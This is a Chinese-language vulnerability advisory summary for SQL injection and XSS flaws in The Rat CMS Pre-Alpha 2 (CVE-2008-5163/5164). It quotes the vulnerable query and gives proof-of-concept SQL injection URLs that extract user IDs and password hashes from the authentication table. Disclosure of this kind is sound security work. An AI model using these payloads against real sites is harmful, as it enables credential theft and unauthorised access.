The Rat CMS Pre-Alpha 2 SQL注入与XSS漏洞分析 (CVE-2008-5163/5164)

### 关键漏洞信息 - **漏洞描述** - **类型**: SQL Injection and Cross-Site Scripting (XSS) - **应用**: The Rat CMS - **版本**: Pre-Alpha 2 - **漏洞详情** - **SQL Injection** - **漏洞文件**: viewarticle.php - **代码片段**: ```sql SELECT title, content FROM news WHERE id=$GET['id']; ``` - **利用方式**: - `http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]` - `http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]` - **POC利用**: - `http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--` - `http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--` - **XSS** - **利用方式**: - `http://[Target]/[trcms_path]/viewarticle.php/` - `http://[Target]/[trcms_path]/viewarticle.php?id=` - `http://[Target]/[trcms_path]/viewarticle2.php?id=` - **关键信息** - **披露日期**: 2008.06.28 - **风险等级**: 高 - **CVE编号**: CVE-2008-5163 | CVE-2008-5164 - **CWE编号**: CWE-89 | CWE-79 - **来源**: CWU Underground Hacking Team - **下载地址**: `http://downloads.sourceforge.net/the-rat-cms` - **参考链接** - http://www.securityfocus.com/bid/29959 - http://www.securityfocus.com/archive/1/archive/1/493684/100/0/threaded

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

The Rat CMS Pre-Alpha 2 SQL注入与XSS漏洞分析 (CVE-2008-5163/5164)

目标达成感谢每一位支持者 — 我们达成了 100% 目标！